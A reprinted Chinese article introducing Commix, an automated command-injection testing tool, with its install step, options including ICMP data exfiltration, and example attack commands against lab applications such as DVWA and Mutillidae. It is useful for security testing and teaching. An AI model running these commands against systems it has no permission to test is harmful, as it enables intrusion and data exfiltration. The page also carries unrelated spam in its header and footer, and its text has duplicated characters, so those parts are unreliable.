精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

系統(tǒng)命令注入漏洞自動(dòng)化測試工具–Commix

責(zé)任編輯:editor006

作者:phper

2015-04-15 13:43:18

摘自:FreeBuf黑客與極客

Commix是一個(gè)適用于web開發(fā)者、滲透測試人員及安全研究者的自動(dòng)化測試工具,可以幫助他們更高效的發(fā)現(xiàn)web應(yīng)用中的命令注入攻擊相關(guān)漏洞。

Commix是一個(gè)適用于web開發(fā)者、滲透測試人員及安全研究者的自動(dòng)化測試工具,可以幫助他們更高效的發(fā)現(xiàn)web應(yīng)用中的命令注入攻擊相關(guān)漏洞。Commix由Python編寫。

 系統(tǒng)命令注入漏洞自動(dòng)化測試工具 – Commix

  環(huán)境要求

Python 2.6.x或2.7.x

安裝

下載git clone https://github.com/stasinopoulos/commix.git commix

使用

基本使用

Usage: python commix.py [options]

選項(xiàng)

-h, --help Show help and exit. --verbose Enable the verbose mode. --install Install 'commix' to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit.

目標(biāo)

--url=URL Target URL. --url-reload Reload target URL after command execution.

請求

--host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --cookie=COOKIE HTTP Cookie header. --headers=HEADERS Extra headers (e.g. 'Header1:Value1 Header2:Value2'). --proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080'). --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-cred=AUTH.. HTTP Basic Authentication credentials (e.g. 'admin:admin').

注入

--data=DATA POST data to inject (use 'INJECT_HERE' tag). --suffix=SUFFIX Injection payload suffix string. --prefix=PREFIX Injection payload prefix string. --technique=TECH Specify a certain injection technique : 'classic', 'eval-based', 'time-based' or 'file-based'. --maxlen=MAXLEN The length of the output on time-based technique (Default: 10000 chars). --delay=DELAY Set Time-delay for time-based and file-based techniques (Default: 1 sec). --base64 Use Base64 (enc)/(de)code trick to prevent false- positive results. --tmp-path=TMP_P.. Set remote absolute path of temporary files directory. --icmp-exfil=IP_.. Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

測試示例

測試漏洞web應(yīng)用Damn

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

使用注入攻擊Payload參數(shù)測試php-Charts 1.0

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

使用特殊的頭和HTTP代理測試OWASP Mutillidae

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr ETag:123 " --proxy="127.0.0.1:8081"

使用ICMP滲漏(exfiltration)技術(shù)測試Persistence

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

鏈接已復(fù)制,快去分享吧

企業(yè)網(wǎng)版權(quán)所有?2010-2024 京ICP備09108050號-6京公網(wǎng)安備 11010502049343號

  • <menuitem id="jw4sk"></menuitem>

    1. <form id="jw4sk"><tbody id="jw4sk"><dfn id="jw4sk"></dfn></tbody></form>
      主站蜘蛛池模板: 信丰县| 通渭县| 肥西县| 英超| 邵阳市| 乌拉特后旗| 白银市| 巢湖市| 庐江县| 将乐县| 九江县| 荥阳市| 淮南市| 八宿县| 涪陵区| 沂水县| 乌鲁木齐县| 江孜县| 新竹市| 安福县| 吉林省| 通山县| 会东县| 类乌齐县| 建湖县| 沂源县| 湛江市| 仙居县| 武邑县| 遵化市| 榆中县| 隆昌县| 连州市| 清丰县| 土默特右旗| 湟中县| 巴马| 高密市| 利辛县| 遂平县| 兰考县|